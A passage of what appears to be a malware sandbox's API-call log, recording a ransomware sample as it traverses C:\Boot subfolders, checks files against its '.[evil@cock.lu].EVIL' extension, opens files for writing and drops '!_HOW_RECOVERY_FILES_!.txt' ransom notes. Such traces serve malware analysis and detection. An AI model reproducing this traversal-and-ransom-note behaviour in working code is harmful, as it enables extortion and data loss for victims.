_snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\sr-Latn-CS\\.") returned 21 [0079.526] wcscmp (_String1=".", _String2=".") returned 0 [0079.526] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.526] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.526] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\sr-Latn-CS\\..") returned 22 [0079.526] wcscmp (_String1=".", _String2="..") returned -1 [0079.527] wcscmp (_String1="..", _String2="..") returned 0 [0079.527] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.527] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.527] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\sr-Latn-CS\\bootmgr.exe.mui") returned 35 [0079.527] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0079.527] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0079.527] wcslen (_String="C:\\\\Boot\\sr-Latn-CS\\bootmgr.exe.mui") returned 0x23 [0079.527] CreateFileW (lpFileName="C:\\\\Boot\\sr-Latn-CS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0079.527] GetLastError () returned 0x5 [0079.527] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.527] wcsstr (_Str="memtest.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.527] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\sr-Latn-CS\\memtest.exe.mui") returned 35 [0079.527] wcscmp (_String1="memtest.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0079.527] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="memtest.exe.mui") returned 0x0 [0079.527] wcslen (_String="C:\\\\Boot\\sr-Latn-CS\\memtest.exe.mui") returned 0x23 [0079.527] CreateFileW (lpFileName="C:\\\\Boot\\sr-Latn-CS\\memtest.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0079.563] GetLastError () returned 0x5 [0079.563] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0079.563] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0079.563] wcslen (_String="C:\\\\Boot\\sr-Latn-CS") returned 0x13 [0079.563] strlen (_Str="${KEY}") returned 0x6 [0079.563] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0079.563] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0079.563] strlen (_Str="${CODE}") returned 0x7 [0079.563] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0079.563] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0079.563] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0079.563] _wfsopen (_FileName="C:\\\\Boot\\sr-Latn-CS\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0079.619] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0079.619] __uncaught_exception () returned 0x84b1160800 [0079.619] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0079.620] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0079.620] wcsstr (_Str="sr-Latn-RS", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.620] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\sr-Latn-RS") returned 19 [0079.620] wcscmp (_String1=".", _String2="sr-Latn-RS") returned -1 [0079.620] wcscmp (_String1="..", _String2="sr-Latn-RS") returned -1 [0079.620] wcslen (_String="C:\\\\Boot\\sr-Latn-RS") returned 0x13 [0079.620] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\sr-Latn-RS" | out: _Destination="C:\\\\Boot\\sr-Latn-RS") returned 0x0 [0079.620] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\sr-Latn-RS\\*") returned="C:\\\\Boot\\sr-Latn-RS\\*" [0079.620] FindFirstFileW (in: lpFileName="C:\\\\Boot\\sr-Latn-RS\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0079.620] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.620] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\sr-Latn-RS\\.") returned 21 [0079.620] wcscmp (_String1=".", _String2=".") returned 0 [0079.620] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.620] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.620] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\sr-Latn-RS\\..") returned 22 [0079.620] wcscmp (_String1=".", _String2="..") returned -1 [0079.620] wcscmp (_String1="..", _String2="..") returned 0 [0079.620] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.620] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.620] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\sr-Latn-RS\\bootmgr.exe.mui") returned 35 [0079.620] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0079.620] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0079.620] wcslen (_String="C:\\\\Boot\\sr-Latn-RS\\bootmgr.exe.mui") returned 0x23 [0079.620] CreateFileW (lpFileName="C:\\\\Boot\\sr-Latn-RS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0079.621] GetLastError () returned 0x5 [0079.621] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0079.621] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0079.621] wcslen (_String="C:\\\\Boot\\sr-Latn-RS") returned 0x13 [0079.621] strlen (_Str="${KEY}") returned 0x6 [0079.621] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0079.621] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0079.621] strlen (_Str="${CODE}") returned 0x7 [0079.621] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0079.621] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0079.621] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0079.621] _wfsopen (_FileName="C:\\\\Boot\\sr-Latn-RS\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0079.622] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0079.622] __uncaught_exception () returned 0x84b1160800 [0079.622] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0079.622] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0079.622] wcsstr (_Str="sv-SE", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.622] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\sv-SE") returned 14 [0079.622] wcscmp (_String1=".", _String2="sv-SE") returned -1 [0079.622] wcscmp (_String1="..", _String2="sv-SE") returned -1 [0079.622] wcslen (_String="C:\\\\Boot\\sv-SE") returned 0xe [0079.622] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\sv-SE" | out: _Destination="C:\\\\Boot\\sv-SE") returned 0x0 [0079.622] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\sv-SE\\*") returned="C:\\\\Boot\\sv-SE\\*" [0079.623] FindFirstFileW (in: lpFileName="C:\\\\Boot\\sv-SE\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0079.623] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.623] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\sv-SE\\.") returned 16 [0079.623] wcscmp (_String1=".", _String2=".") returned 0 [0079.623] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.623] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.623] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\sv-SE\\..") returned 17 [0079.623] wcscmp (_String1=".", _String2="..") returned -1 [0079.623] wcscmp (_String1="..", _String2="..") returned 0 [0079.623] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.623] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.623] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui") returned 30 [0079.623] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0079.623] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0079.623] wcslen (_String="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui") returned 0x1e [0079.623] CreateFileW (lpFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0079.635] GetLastError () returned 0x5 [0079.635] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.635] wcsstr (_Str="memtest.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.635] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\sv-SE\\memtest.exe.mui") returned 30 [0079.635] wcscmp (_String1="memtest.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0079.635] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="memtest.exe.mui") returned 0x0 [0079.635] wcslen (_String="C:\\\\Boot\\sv-SE\\memtest.exe.mui") returned 0x1e [0079.635] CreateFileW (lpFileName="C:\\\\Boot\\sv-SE\\memtest.exe.mui" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0079.635] GetLastError () returned 0x5 [0079.635] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0079.635] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0079.635] wcslen (_String="C:\\\\Boot\\sv-SE") returned 0xe [0079.635] strlen (_Str="${KEY}") returned 0x6 [0079.635] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0079.635] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0079.635] strlen (_Str="${CODE}") returned 0x7 [0079.635] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0079.635] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0079.635] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0079.635] _wfsopen (_FileName="C:\\\\Boot\\sv-SE\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0079.656] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0079.656] __uncaught_exception () returned 0x84b1160800 [0079.656] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0079.657] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0079.657] wcsstr (_Str="tr-TR", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.657] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\tr-TR") returned 14 [0079.657] wcscmp (_String1=".", _String2="tr-TR") returned -1 [0079.657] wcscmp (_String1="..", _String2="tr-TR") returned -1 [0079.657] wcslen (_String="C:\\\\Boot\\tr-TR") returned 0xe [0079.657] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\tr-TR" | out: _Destination="C:\\\\Boot\\tr-TR") returned 0x0 [0079.657] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\tr-TR\\*") returned="C:\\\\Boot\\tr-TR\\*" [0079.657] FindFirstFileW (in: lpFileName="C:\\\\Boot\\tr-TR\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0079.657] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.657] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\tr-TR\\.") returned 16 [0079.657] wcscmp (_String1=".", _String2=".") returned 0 [0079.657] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.657] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.657] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\tr-TR\\..") returned 17 [0079.657] wcscmp (_String1=".", _String2="..") returned -1 [0079.657] wcscmp (_String1="..", _String2="..") returned 0 [0079.657] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.657] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.657] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui") returned 30 [0079.657] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0079.657] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0079.657] wcslen (_String="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui") returned 0x1e [0079.657] CreateFileW (lpFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0079.658] GetLastError () returned 0x5 [0079.658] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.658] wcsstr (_Str="memtest.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.658] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\tr-TR\\memtest.exe.mui") returned 30 [0079.658] wcscmp (_String1="memtest.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0079.658] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="memtest.exe.mui") returned 0x0 [0079.658] wcslen (_String="C:\\\\Boot\\tr-TR\\memtest.exe.mui") returned 0x1e [0079.658] CreateFileW (lpFileName="C:\\\\Boot\\tr-TR\\memtest.exe.mui" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0079.744] GetLastError () returned 0x5 [0079.744] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0079.744] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0079.744] wcslen (_String="C:\\\\Boot\\tr-TR") returned 0xe [0079.744] strlen (_Str="${KEY}") returned 0x6 [0079.744] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0079.744] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0079.744] strlen (_Str="${CODE}") returned 0x7 [0079.744] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0079.744] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0079.744] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0079.744] _wfsopen (_FileName="C:\\\\Boot\\tr-TR\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0079.753] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0079.753] __uncaught_exception () returned 0x84b1160800 [0079.753] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0079.754] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0079.754] wcsstr (_Str="uk-UA", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.754] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\uk-UA") returned 14 [0079.754] wcscmp (_String1=".", _String2="uk-UA") returned -1 [0079.754] wcscmp (_String1="..", _String2="uk-UA") returned -1 [0079.754] wcslen (_String="C:\\\\Boot\\uk-UA") returned 0xe [0079.754] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\uk-UA" | out: _Destination="C:\\\\Boot\\uk-UA") returned 0x0 [0079.754] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\uk-UA\\*") returned="C:\\\\Boot\\uk-UA\\*" [0079.754] FindFirstFileW (in: lpFileName="C:\\\\Boot\\uk-UA\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0079.754] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.754] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\uk-UA\\.") returned 16 [0079.754] wcscmp (_String1=".", _String2=".") returned 0 [0079.754] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.754] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.754] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\uk-UA\\..") returned 17 [0079.754] wcscmp (_String1=".", _String2="..") returned -1 [0079.754] wcscmp (_String1="..", _String2="..") returned 0 [0079.754] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.754] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.754] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\uk-UA\\bootmgr.exe.mui") returned 30 [0079.754] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0079.754] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0079.754] wcslen (_String="C:\\\\Boot\\uk-UA\\bootmgr.exe.mui") returned 0x1e [0079.754] CreateFileW (lpFileName="C:\\\\Boot\\uk-UA\\bootmgr.exe.mui" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0079.755] GetLastError () returned 0x5 [0079.755] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0079.755] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0079.755] wcslen (_String="C:\\\\Boot\\uk-UA") returned 0xe [0079.755] strlen (_Str="${KEY}") returned 0x6 [0079.755] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0079.755] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0079.755] strlen (_Str="${CODE}") returned 0x7 [0079.755] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0079.755] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0079.755] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0079.755] _wfsopen (_FileName="C:\\\\Boot\\uk-UA\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0079.755] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0079.755] __uncaught_exception () returned 0x84b1160800 [0079.755] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0079.756] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0079.756] wcsstr (_Str="zh-CN", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.756] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\zh-CN") returned 14 [0079.756] wcscmp (_String1=".", _String2="zh-CN") returned -1 [0079.756] wcscmp (_String1="..", _String2="zh-CN") returned -1 [0079.756] wcslen (_String="C:\\\\Boot\\zh-CN") returned 0xe [0079.756] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\zh-CN" | out: _Destination="C:\\\\Boot\\zh-CN") returned 0x0 [0079.756] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\zh-CN\\*") returned="C:\\\\Boot\\zh-CN\\*" [0079.756] FindFirstFileW (in: lpFileName="C:\\\\Boot\\zh-CN\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0079.756] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.756] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\zh-CN\\.") returned 16 [0079.756] wcscmp (_String1=".", _String2=".") returned 0 [0079.756] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.756] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.756] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\zh-CN\\..") returned 17 [0079.756] wcscmp (_String1=".", _String2="..") returned -1 [0079.756] wcscmp (_String1="..", _String2="..") returned 0 [0079.756] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.756] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.756] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui") returned 30 [0079.756] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0079.756] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0079.757] wcslen (_String="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui") returned 0x1e [0079.757] CreateFileW (lpFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0079.799] GetLastError () returned 0x5 [0079.799] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.799] wcsstr (_Str="memtest.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.799] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\zh-CN\\memtest.exe.mui") returned 30 [0079.799] wcscmp (_String1="memtest.exe.mui", 